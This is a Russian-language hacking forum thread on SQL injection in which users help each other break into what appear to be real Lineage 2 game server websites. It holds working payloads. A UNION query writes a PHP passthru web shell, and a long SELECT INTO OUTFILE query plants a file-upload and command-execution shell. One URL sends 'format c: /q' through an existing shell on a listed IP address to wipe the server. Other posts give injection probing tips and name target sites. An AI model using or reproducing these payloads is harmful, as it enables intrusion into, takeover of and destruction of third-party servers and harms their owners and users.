[Статья] SQL инъекция

[3acuson]

[Ссылки могут видеть только зарегистрированные пользователи. ]
некак немогу подобрать может у вас получиться

[bool]

Кол-во полей 12
Дальше не ушел....

[CeDou]

Похоже что нет прав на создание/запись файла, т.к. это запрос проходит:
sdfasd'union select null,null,null,null,null,null,null,null,null,null, null,null'<?php passthru($_GET["cmd"]); ?>'#

[6a4a]

Цитата: Сообщение от wagan Через базу - не вариант, почти ниодин шелл не заливает

Вот такой запрос сделай, он создаст шелл по указанному пути с возможностью аплоада файлов.

Код:

select '<html> <head> <title>uploader</title>',
'<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">',
'<style type="text/css"> </style> </head>',
'<body bgcolor="#999999" text="#000000">',
'<center> <table width="700" border="0" bgcolor="#000066">',
'<tr> <td> <table width="100%" border="0" bgcolor="#CCCCCC"> <tr> <td>',
'<p><font size="2"><b><font color="#FF0000">&nbsp;&nbsp;&nbsp;System: ',
'<font color="#000000"> ',
'<?php passthru("uname -a"); ?>',
'</font><br>',
' &nbsp;&nbsp;&nbsp;Our permissions: <font color="#000000"> ',
'<?php passthru("id"); ?>',
'</font><br>',
'&nbsp;&nbsp;&nbsp;Our locality: <font color="#000000"> ',
' <?php passthru("pwd"); ?>',
'</font></font></b></font></p>',
'<pre> <?php $uploaded = $_FILES[''userfile''][''tmp_name''];',
'if (file_exists($uploaded)) {' ,
' $pwd_dir = $_POST[''dira''];',
'$real = $_FILES[''userfile''][''name'']; ',
'$destination = $pwd_dir."/".$real;',
'copy($uploaded, $destination);',
'echo "Uploaded process:";',
'print_r ($_FILES); ',
'echo "FILE UPLOADED TO $destination";',
'} else {',
'echo "&nbsp;&nbsp;No file uploaded"; }?>',
'</pre> <form name="form1" method="post" enctype="multipart/form-data">',
'<table width="100%" border="0"> <tr> ',
'<td width="35%"><font size="2"><b>&nbsp;&nbsp;Browse file to upload:</b></font></td>',
'<td width="65%">' ,
'<input type="file" name="userfile" size="45">',
'</td> </tr> <tr>',
'<td width="35%"><b><font size="2">&nbsp;&nbsp;Destination:</font></b></td>',
'<td width="65%"> ',
'<input type="text" name="dira" size="45" value="<?php passthru("pwd"); ?>">',
'<input type="submit" name="submit2" value="upload">',
'</td> </tr> <tr> <td width="35%">',
'<div align="right"> </div> </td>',
'<td width="65%">&nbsp; </td> </tr> <tr>',
'<td width="35%"><b><font size="2">&nbsp;&nbsp;Command to execute:</font></b></td>',
'<td width="65%">',
'<input type="text" name="cmd" size="45" value="<?php echo $_POST[''cmd'']; ?>">',
'<input type="submit" name="submit" value="execute"> </td> </tr> <tr>' ,
'<td width="35%"> <div align="right"> </div> </td>',
'<td width="65%">&nbsp; </td> </tr> </table> </form> <p> <pre>',
'<?php if ($_POST[''cmd'']){ $cmd = $_POST[''cmd''];',
'echo "$cmd executed...<br>";  passthru("$cmd"); }',
' else { echo "No shell command executed"; } ?></pre>',
'<div align="right"> <font size="1"><b>2003 &copy; </b></font> </div>',
'</td> </tr> </table> </td> </tr> </table> </center> </body> </html>' into outfile 
'тут полный путь к файлу с обратными слешами, например c:/shell/shell.php'

[-=Angel=-]

Наткнулся на одном сайте на :

Цитата: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%') UNION (SELECT name,item_id,crystal_type,weight,soulshots,spi' at line 1

Подскажите можно ли как то дальше продвинуться?)

[talala]

Цитата: Подскажите можно ли как то дальше продвинуться?)

Кинь в личку адрес с ошибкой, проверить кое-что хотелось бы. Если конечно не жалко.

[necros555]

Warning: Invalid argument supplied for foreach() in /home/killer245/domains/l2justgame.com/public_html/components/com_content/models/frontpage.php on line 104
с такой ошибкой дальше можно как то продвинутся?

[Nickitee]

Цитата: Сообщение от Roomeoo ОНОТОЛЬе +1

Некропостер

Действовал по гайду бачи, не получилось , иммено при заливке шелла

[Savage^^]

[Ссылки могут видеть только зарегистрированные пользователи. ]
дальше в лом стало. кому интересно- копайтесь

[zenn]

Цитата: Сообщение от savage0100 [Ссылки могут видеть только зарегистрированные пользователи. ] дальше в лом стало. кому интересно- копайтесь

Да вайп ему нах:

Код:

http://64.186.132.15/acm/class.php?cmd=format%20c:%20/q

ну и в обьеденение && y

[f1la]

а если ошибки не вылазят, после захода? тогда невозможно продлжить?
(тоесть нет локального адреса папки acm)

[6a4a]

В поле логина введи adgasdga'
Обязательно с ковычкой на конце. Иногда ошибок не видно из за черного фона. Иногда ошибки просто не возвращаются. Попробуй подставлять заведомо неправильные данные в другие пхп скрипты.

[KAKAfon9I]

Есть сайт но не могу подключиться к базеВ конфиге выставлено что все подключения только с локалхоста...Что можно с этим сделать?

[f1la]

ht_tp://www.l2athebaldt.com/acm/index.php?act=account
dsafasd'union select 1,2,3,4,5,6,7,8#

я пробовал все что ты писал, так же заведомо неправильные данные, ошибки не выводит. так же на многих серверах такой трабл.
на l2appeal что ты описал закрыли этот баг. (походу)
лишь на одном сервере выдало.. и то не добавляется class.php(

[6a4a]

[Ссылки могут видеть только зарегистрированные пользователи. ]